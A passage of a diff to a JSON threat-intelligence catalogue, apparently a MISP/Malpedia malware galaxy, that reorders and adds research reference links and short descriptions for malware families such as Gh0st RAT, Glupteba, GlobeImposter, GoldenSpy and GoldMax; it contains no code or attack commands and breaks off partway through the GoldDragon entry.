"https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2014-11-26-getmypass-point-of-sale-malware.md", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-pos-malware-kicks-off-holiday-shopping-weekend/", + "https://securitykitten.github.io/2015/01/08/getmypass-point-of-sale-malware-update.html", "https://securitykitten.github.io/2014/11/26/getmypass-point-of-sale-malware.html", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-pos-malware-kicks-off-holiday-shopping-weekend/" + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-evolution-of-point-of-sale-pos-malware", + "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2015-01-08-getmypass-point-of-sale-malware-update.md" ], "synonyms": [ "getmypos" @@ -25789,13 +26963,29 @@ "uuid": "a762023d-8d46-43a8-be01-3b2362963de0", "value": "get_pwd" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gh0stbins", + "https://any.run/cybersecurity-blog/gh0stbins-chinese-rat-malware-analysis/" + ], + "synonyms": [ + "Gh0stBins RAT" + ], + "type": [] + }, + "uuid": "07ef4b03-c512-490c-905a-f7c2e3a47eba", + "value": "Gh0stBins" + }, { "description": "Custom RAT developed by the BlackTech actor, based on the Gh0st RAT.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gh0sttimes", - "https://blogs.jpcert.or.jp/en/2021/10/gh0sttimes.html", - "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf" + "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf", + "https://www.youtube.com/watch?v=uakw2HMGZ-I", + "https://blogs.jpcert.or.jp/en/2021/10/gh0sttimes.html" ], "synonyms": [], "type": [] @@ -25821,9 +27011,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghole", - "https://documents.trendmicro.com/assets/wp/wp-operation-woolen-goldfish.pdf", "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf", - "https://www.clearskysec.com/gholee-a-protective-edge-themed-spear-phishing-campaign/" + "https://www.clearskysec.com/gholee-a-protective-edge-themed-spear-phishing-campaign/", + "https://documents.trendmicro.com/assets/wp/wp-operation-woolen-goldfish.pdf" ], "synonyms": [ "CoreImpact (Modified)", @@ -25856,8 +27046,8 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostnet", "https://documents.trendmicro.com/assets/wp/wp-detecting-apt-activity-with-network-traffic-analysis.pdf", "https://www.nartv.org/2019/03/28/10-years-since-ghostnet/", - "https://en.wikipedia.org/wiki/GhostNet", - "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html" + "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html", + "https://en.wikipedia.org/wiki/GhostNet" ], "synonyms": [ "Remosh" @@ -25872,8 +27062,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_admin", - "https://www.bleepingcomputer.com/news/security/new-ghostadmin-malware-used-for-data-theft-and-exfiltration/", - "https://www.cylance.com/en_us/blog/threat-spotlight-ghostadmin.html" + "https://www.cylance.com/en_us/blog/threat-spotlight-ghostadmin.html", + "https://www.bleepingcomputer.com/news/security/new-ghostadmin-malware-used-for-data-theft-and-exfiltration/" ], "synonyms": [ "Ghost iBot" @@ -25884,75 +27074,76 @@ "value": "GhostAdmin" }, { - "description": "According to Security Ninja, Gh0st RAT (Remote Access Terminal) is a trojan “Remote Access Tool” used on Windows platforms, and has been used to hack into some of the most sensitive computer networks on Earth.\r\n\r\nBelow is a list of Gh0st RAT capabilities.\r\nTake full control of the remote screen on the infected bot.\r\nProvide real time as well as offline keystroke logging.\r\nProvide live feed of webcam, microphone of infected host.\r\nDownload remote binaries on the infected remote host.\r\nTake control of remote shutdown and reboot of host.\r\nDisable infected computer remote pointer and keyboard input.\r\nEnter into shell of remote infected host with full control.\r\nProvide a list of all the active processes.\r\nClear all existing SSDT of all existing hooks.", + "description": "According to Security Ninja, Gh0st RAT (Remote Access Terminal) is a trojan \u201cRemote Access Tool\u201d used on Windows platforms, and has been used to hack into some of the most sensitive computer networks on Earth.\r\n\r\nBelow is a list of Gh0st RAT capabilities.\r\nTake full control of the remote screen on the infected bot.\r\nProvide real time as well as offline keystroke logging.\r\nProvide live feed of webcam, microphone of infected host.\r\nDownload remote binaries on the infected remote host.\r\nTake control of remote shutdown and reboot of host.\r\nDisable infected computer remote pointer and keyboard input.\r\nEnter into shell of remote infected host with full control.\r\nProvide a list of all the active processes.\r\nClear all existing SSDT of all existing hooks.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_rat", - "http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf", - "https://attack.mitre.org/groups/G0096", - "https://documents.trendmicro.com/assets/Appendix_Water-Pamola-Attacked-Online-Shops-Via-Malicious-Orders.pdf", - "https://cofense.com/blog/open-source-gh0st-rat-still-haunting-inboxes-15-years-after-release/", - "https://www.secureworks.com/research/threat-profiles/bronze-union", - "https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/", - "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022", - "https://blog.prevailion.com/2020/06/the-gh0st-remains-same8.html", - "https://tccontre.blogspot.com/2021/02/gh0strat-anti-debugging-nested-seh-try.html", - "https://asec.ahnlab.com/en/32572/", - "https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox", - "https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html", - "https://medium.com/insomniacs/what-happened-between-the-bigbadwolf-and-the-tiger-925549a105b2", - "https://risky.biz/whatiswinnti/", - "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", - "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", - "https://blog.cylance.com/the-ghost-dragon", - "https://thehackernews.com/2022/04/chinese-hackers-target-vmware-horizon.html", - "https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html", - "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html", - "http://www.nartv.org/mirror/ghostnet.pdf", - "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", - "https://attack.mitre.org/groups/G0011", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/", - "https://www.secureworks.com/research/threat-profiles/bronze-fleetwood", - "https://blog.talosintelligence.com/2019/09/panda-evolution.html", - "https://www.trendmicro.com/en_us/research/21/d/water-pamola-attacked-online-shops-via-malicious-orders.html", - "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf", - "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html", - "https://www.seqrite.com/blog/rat-used-by-chinese-cyberspies-infiltrating-indian-businesses/", - "https://www.bitdefender.com/files/News/CaseStudies/study/185/Bitdefender-Business-2017-WhitePaper-PZCHAO-crea2452-en-EN-GenericUse.pdf", - "https://attack.mitre.org/groups/G0026", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats", - "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols", - "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/covid-19-and-new-year-greetings-the-higaisa-group/", "https://www.fortinet.com/blog/threat-research/deep-panda-log4shell-fire-chili-rootkits", - "https://www.proofpoint.com/us/threat-insight/post/north-korea-bitten-bitcoin-bug-financially-motivated-campaigns-reveal-new", - "https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/", - "https://st.drweb.com/static/new-www/news/2021/april/drweb_research_attacks_on_russian_research_institutes_en.pdf", - "https://www.secureworks.com/research/threat-profiles/bronze-edison", - "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf", - "https://www.datanet.co.kr/news/articleView.html?idxno=133346", - "https://attack.mitre.org/groups/G0001/", - "https://blogs.jpcert.or.jp/en/2021/10/gh0sttimes.html", + "https://asec.ahnlab.com/en/32572/", + "https://www.youtube.com/watch?v=uakw2HMGZ-I", + "https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/", + "https://hackcon.org/uploads/327/05%20-%20Kwak.pdf", + "https://www.intezer.com/blog-chinaz-relations/", + "https://blog.cylance.com/the-ghost-dragon", + "https://www.secureworks.com/research/threat-profiles/bronze-union", "https://unit42.paloaltonetworks.com/atoms/iron-taurus/", "https://www.prevailion.com/the-gh0st-remains-the-same-2/", + "https://www.trendmicro.com/en_us/research/21/d/water-pamola-attacked-online-shops-via-malicious-orders.html", + "https://st.drweb.com/static/new-www/news/2021/april/drweb_research_attacks_on_russian_research_institutes_en.pdf", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html", "http://www.hexblog.com/?p=1248", - "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf", - "https://www.intezer.com/blog/malware-analysis/chinaz-relations/", - "https://www.secureworks.com/research/threat-profiles/bronze-globe", - "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", - "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", - "https://research.nccgroup.com/2018/04/17/decoding-network-data-from-a-gh0st-rat-variant/", "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophoslabs-cloud-snooper-report.pdf", - "https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report", - "https://www.intezer.com/blog-chinaz-relations/", - "https://web.archive.org/web/20140816135909/https://www.symantec.com/connect/blogs/inside-back-door-attack", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/covid-19-and-new-year-greetings-the-higaisa-group/", - "https://web.archive.org/web/20170311192337/http://download01.norman.no:80/documents/ThemanyfacesofGh0stRat.pdf", "http://www.malware-traffic-analysis.net/2018/01/04/index.html", - "https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-inside-a-highly-specialized-espionage-infrastructure/", + "https://risky.biz/whatiswinnti/", + "https://medium.com/insomniacs/what-happened-between-the-bigbadwolf-and-the-tiger-925549a105b2", + "https://attack.mitre.org/groups/G0026", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats", "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-globe", + "http://www.nartv.org/mirror/ghostnet.pdf", + "https://www.bitdefender.com/files/News/CaseStudies/study/185/Bitdefender-Business-2017-WhitePaper-PZCHAO-crea2452-en-EN-GenericUse.pdf", + "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf", + "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf", + "https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report", + "https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html", + "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols", + "https://research.nccgroup.com/2018/04/17/decoding-network-data-from-a-gh0st-rat-variant/", + "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html", + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html", + "https://blogs.jpcert.or.jp/en/2021/10/gh0sttimes.html", + "https://attack.mitre.org/groups/G0096", + "https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox", + "https://documents.trendmicro.com/assets/Appendix_Water-Pamola-Attacked-Online-Shops-Via-Malicious-Orders.pdf", + "https://cofense.com/blog/open-source-gh0st-rat-still-haunting-inboxes-15-years-after-release/", + "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf", + "https://www.datanet.co.kr/news/articleView.html?idxno=133346", + "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", + "https://web.archive.org/web/20170311192337/http://download01.norman.no:80/documents/ThemanyfacesofGh0stRat.pdf", + "https://thehackernews.com/2022/04/chinese-hackers-target-vmware-horizon.html", + "https://web.archive.org/web/20140816135909/https://www.symantec.com/connect/blogs/inside-back-door-attack", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/", + "https://www.secureworks.com/research/threat-profiles/bronze-fleetwood", "https://s.tencent.com/research/report/836.html", - "https://hackcon.org/uploads/327/05%20-%20Kwak.pdf", - "https://blogs.blackberry.com/en/2021/10/drawing-a-dragon-connecting-the-dots-to-find-apt41" + "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022", + "https://attack.mitre.org/groups/G0001/", + "https://blogs.blackberry.com/en/2021/10/drawing-a-dragon-connecting-the-dots-to-find-apt41", + "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia", + "https://www.intezer.com/blog/malware-analysis/chinaz-relations/", + "https://www.proofpoint.com/us/threat-insight/post/north-korea-bitten-bitcoin-bug-financially-motivated-campaigns-reveal-new", + "https://tccontre.blogspot.com/2021/02/gh0strat-anti-debugging-nested-seh-try.html", + "https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/", + "https://attack.mitre.org/groups/G0011", + "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", + "https://www.secureworks.com/research/threat-profiles/bronze-edison", + "https://www.seqrite.com/blog/rat-used-by-chinese-cyberspies-infiltrating-indian-businesses/", + "http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf", + "https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-inside-a-highly-specialized-espionage-infrastructure/", + "https://blog.prevailion.com/2020/06/the-gh0st-remains-same8.html", + "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", + "https://blog.talosintelligence.com/2019/09/panda-evolution.html" ], "synonyms": [ "Farfli", @@ -26003,6 +27194,20 @@ "uuid": "6ad51e4a-b44d-43c8-9f55-b9fe06a2c06d", "value": "Giffy" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gimmick", + "http://stillu.cc/assets/slides/2023-08-Unmasking%20CamoFei.pdf", + "https://www.volexity.com/blog/2022/03/22/storm-cloud-on-the-horizon-gimmick-malware-strikes-at-macos/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "59e8424b-f2e6-4542-bbb3-0e62a4596a01", + "value": "GIMMICK (Windows)" + }, { "description": "", "meta": { @@ -26021,10 +27226,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ginzo", + "https://www.govcert.ch/downloads/whitepapers/Unflattening-ConfuserEx-Code-in-IDA.pdf", "https://ke-la.com/information-stealers-a-new-landscape/", "https://blog.talosintelligence.com/haskers-gang-zingostealer/", - "https://twitter.com/struppigel/status/1506933328599044100", - "https://www.govcert.ch/downloads/whitepapers/Unflattening-ConfuserEx-Code-in-IDA.pdf" + "https://twitter.com/struppigel/status/1506933328599044100" ], "synonyms": [], "type": [] @@ -26077,27 +27282,27 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.globeimposter", - "https://www.youtube.com/watch?v=LUxOcpIRxmg", - "https://blog.ensilo.com/globeimposter-ransomware-technical", - "https://www.acronis.com/en-us/blog/posts/globeimposter-ransomware-holiday-gift-necurs-botnet", - "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much", - "https://blog.fortinet.com/2017/08/05/analysis-of-new-globeimposter-ransomware-variant", - "https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/", - "https://asec.ahnlab.com/en/48940/", - "https://info.phishlabs.com/blog/globe-imposter-ransomware-makes-a-new-run", - "https://blog.360totalsecurity.com/en/globeimposter-which-has-more-than-20-variants-is-still-wildly-growing/", - "https://asec.ahnlab.com/ko/30284/", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", - "https://www.bleepingcomputer.com/news/security/new-doc-globeimposter-ransomware-variant-malspam-campaign-underway/", - "https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Ransomware_whitepaper_eng.pdf", - "https://www.emsisoft.com/ransomware-decryption-tools/globeimposter", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", - "https://www.secureworks.com/research/threat-profiles/gold-swathmore", - "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://www.sentinelone.com/blog/recent-tzw-campaigns-revealed-as-part-of-globeimposter-malware-family/", "https://intel471.com/blog/a-brief-history-of-ta505", - "https://isc.sans.edu/diary/23417" + "https://www.sentinelone.com/blog/recent-tzw-campaigns-revealed-as-part-of-globeimposter-malware-family/", + "https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", + "https://asec.ahnlab.com/ko/30284/", + "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much", + "https://blog.360totalsecurity.com/en/globeimposter-which-has-more-than-20-variants-is-still-wildly-growing/", + "https://asec.ahnlab.com/en/48940/", + "https://www.acronis.com/en-us/blog/posts/globeimposter-ransomware-holiday-gift-necurs-botnet", + "https://www.secureworks.com/research/threat-profiles/gold-swathmore", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://www.bleepingcomputer.com/news/security/new-doc-globeimposter-ransomware-variant-malspam-campaign-underway/", + "https://blog.ensilo.com/globeimposter-ransomware-technical", + "https://www.emsisoft.com/ransomware-decryption-tools/globeimposter", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://info.phishlabs.com/blog/globe-imposter-ransomware-makes-a-new-run", + "https://isc.sans.edu/diary/23417", + "https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Ransomware_whitepaper_eng.pdf", + "https://blog.fortinet.com/2017/08/05/analysis-of-new-globeimposter-ransomware-variant", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf" ], "synonyms": [ "Fake Globe" @@ -26137,31 +27342,32 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba", - "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/", - "https://habr.com/ru/company/solarsecurity/blog/578900/", - "https://www.nozominetworks.com/blog/tracking-malicious-glupteba-activity-through-the-blockchain/", - "https://storage.googleapis.com/gweb-uniblog-publish-prod/documents/1_Complaint.pdf", - "https://dissectingmalwa.re/the-blame-game-about-false-flags-and-overwritten-mbrs.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/glupteba-campaign-hits-network-routers-and-updates-cc-servers-with-data-from-bitcoin-transactions/", - "https://news.sophos.com/en-us/2020/06/24/glupteba-report/?cmp=30728", - "https://www.welivesecurity.com/2011/03/02/tdl4-and-glubteba-piggyback-piggybugs/", - "https://www.domaintools.com/resources/blog/identifying-network-infrastructure-related-to-a-who-spoofing-campaign", - "https://medium.com/csis-techblog/installcapital-when-adware-becomes-pay-per-install-cyber-crime-15516249a451", - "https://community.riskiq.com/article/2a36a7d2/description", - "https://blog.chainalysis.com/reports/2022-crypto-crime-report-preview-malware/", "https://blog.google/technology/safety-security/new-action-combat-cyber-crime/", - "https://blog.google/threat-analysis-group/disrupting-glupteba-operation/", - "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", - "https://nakedsecurity.sophos.com/2020/06/24/glupteba-the-bot-that-gets-secret-messages-from-the-bitcoin-blockchain/", - "https://labs.k7computing.com/?p=22319", - "https://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/", - "http://resources.infosecinstitute.com/tdss4-part-1/", - "https://krebsonsecurity.com/2022/06/the-link-between-awm-proxy-the-glupteba-botnet/?utm_source=dlvr.it&utm_medium=twitter", + "https://www.bitdefender.com/files/News/CaseStudies/study/400/Bitdefender-PR-Whitepaper-MosaicLoader-creat5540-en-EN.pdf", "https://thehackernews.com/2022/03/over-200000-microtik-routers-worldwide.html", - "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", - "https://decoded.avast.io/martinhron/meris-and-trickbot-standing-on-the-shoulders-of-giants/", + "https://www.domaintools.com/resources/blog/identifying-network-infrastructure-related-to-a-who-spoofing-campaign", + "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/", + "https://cocomelonc.github.io/malware/2023/06/19/malware-av-evasion-17.html", + "https://habr.com/ru/company/solarsecurity/blog/578900/", + "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", + "https://storage.googleapis.com/gweb-uniblog-publish-prod/documents/1_Complaint.pdf", + "https://labs.k7computing.com/?p=22319", + "https://news.sophos.com/en-us/2020/06/24/glupteba-report/?cmp=30728", + "https://blog.google/threat-analysis-group/disrupting-glupteba-operation/", + "https://blog.chainalysis.com/reports/2022-crypto-crime-report-preview-malware/", "https://www.trendmicro.com/en_us/research/21/j/ransomware-operators-found-using-new-franchise-business-model.html", - "https://www.bitdefender.com/files/News/CaseStudies/study/400/Bitdefender-PR-Whitepaper-MosaicLoader-creat5540-en-EN.pdf" + "https://community.riskiq.com/article/2a36a7d2/description", + "http://resources.infosecinstitute.com/tdss4-part-1/", + "https://www.nozominetworks.com/blog/tracking-malicious-glupteba-activity-through-the-blockchain/", + "https://krebsonsecurity.com/2022/06/the-link-between-awm-proxy-the-glupteba-botnet/?utm_source=dlvr.it&utm_medium=twitter", + "https://www.welivesecurity.com/2011/03/02/tdl4-and-glubteba-piggyback-piggybugs/", + "https://dissectingmalwa.re/the-blame-game-about-false-flags-and-overwritten-mbrs.html", + "https://decoded.avast.io/martinhron/meris-and-trickbot-standing-on-the-shoulders-of-giants/", + "https://medium.com/csis-techblog/installcapital-when-adware-becomes-pay-per-install-cyber-crime-15516249a451", + "https://nakedsecurity.sophos.com/2020/06/24/glupteba-the-bot-that-gets-secret-messages-from-the-bitcoin-blockchain/", + "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", + "https://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/" ], "synonyms": [], "type": [] @@ -26202,9 +27408,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.godlike12", - "https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/", + "https://securelist.com/apt-trends-report-q2-2020/97937/", "https://securelist.com/holy-water-ongoing-targeted-water-holing-attack-in-asia/96311/", - "https://securelist.com/apt-trends-report-q2-2020/97937/" + "https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/" ], "synonyms": [ "GOSLU" @@ -26219,8 +27425,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.godoh", - "https://github.com/sensepost/goDoH", - "https://sensepost.com/blog/2018/waiting-for-godoh/" + "https://sensepost.com/blog/2018/waiting-for-godoh/", + "https://github.com/sensepost/goDoH" ], "synonyms": [], "type": [] @@ -26302,8 +27508,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldeneye", - "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", - "https://blog.malwarebytes.com/threat-analysis/2016/12/goldeneye-ransomware-the-petyamischa-combo-rebranded/" + "https://blog.malwarebytes.com/threat-analysis/2016/12/goldeneye-ransomware-the-petyamischa-combo-rebranded/", + "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/" ], "synonyms": [ "Petya/Mischa" @@ -26328,19 +27534,19 @@ "value": "GoldenHelper" }, { - "description": "", + "description": "According securityweek, GoldenSpy, the malware was observed as part of a campaign that supposedly started in April 2020, but some of the identified samples suggest the threat has been around since at least December 2016.\r\n\r\nOne of the compromised organizations, a global technology vendor that conducts government business in the US, Australia and UK, and which recently opened offices in China, became infected after installing \u201cIntelligent Tax,\u201d a piece of software from the Golden Tax Department of Aisino Corporation, which a local bank required for paying local taxes.\r\n\r\nAlthough it worked as advertised, the software was found to install a hidden backdoor to provide remote operators with the possibility to execute Windows commands or upload and run files.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldenspy", - "https://www.bka.de/SharedDocs/Downloads/DE/IhreSicherheit/Warnhinweise/WarnhinweisGOLDENSPY.pdf", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-two-the-uninstaller/", - "https://www.ic3.gov/media/news/2020/200728.pdf", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-3-new-and-improved-uninstaller/", "https://trustwave.azureedge.net/media/16908/the-golden-tax-department-and-emergence-of-goldenspy-malware.pdf", - "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf", + "https://www.ic3.gov/media/news/2020/200728.pdf", + "https://www.bka.de/SharedDocs/Downloads/DE/IhreSicherheit/Warnhinweise/WarnhinweisGOLDENSPY.pdf", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-4-goldenhelper-malware-embedded-in-official-golden-tax-software/", - "https://www.ic3.gov/Media/News/2020/201103-1.pdf", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/" + "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-two-the-uninstaller/", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-3-new-and-improved-uninstaller/", + "https://www.ic3.gov/Media/News/2020/201103-1.pdf" ], "synonyms": [], "type": [] @@ -26353,16 +27559,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldmax", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a", "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a", + "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf", "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf", "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-backdoors-rats-loaders-evasion-techniques", - "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf", - "https://x0r19x91.gitlab.io/post/malware-analysis/sunshuttle/", - "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/", - "https://securelist.com/extracting-type-information-from-go-binaries/104715/", "https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/", - "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/" + "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/", + "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", + "https://securelist.com/extracting-type-information-from-go-binaries/104715/", + "https://x0r19x91.gitlab.io/post/malware-analysis/sunshuttle/", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a" ], "synonyms": [ "SUNSHUTTLE" @@ -26373,15 +27579,15 @@ "value": "GoldMax" }, { - "description": "GoldDragon was a second-stage backdoor which established a permanent presence on the victim’s system once the first-stage, file-less, PowerShell-based attack leveraging steganography was executed. The initial attack was observed first in December 2017, when a Korean-language spear phishing campaing targeted organizations linked with Pyeongchang Winter Olympics 2018. GoldDragon was delivered once the attacker had gained an initial foothold in the targeted environment.\r\n\r\nThe malware was capable of a basic reconnaissance, data exfiltration and downloading of additional components from its C&C server. ", + "description": "GoldDragon was a second-stage backdoor which established a permanent presence on the victim\u2019s system once the first-stage, file-less, PowerShell-based attack leveraging steganography was executed. The initial attack was observed first in December 2017, when a Korean-language spear phishing campaing targeted organizations linked with Pyeongchang Winter Olympics 2018. GoldDragon was delivered once the attacker had gained an initial foothold in the targeted environment.\r\n\r\nThe malware was capable of a basic reconnaissance, data exfiltration and downloading of additional components from its 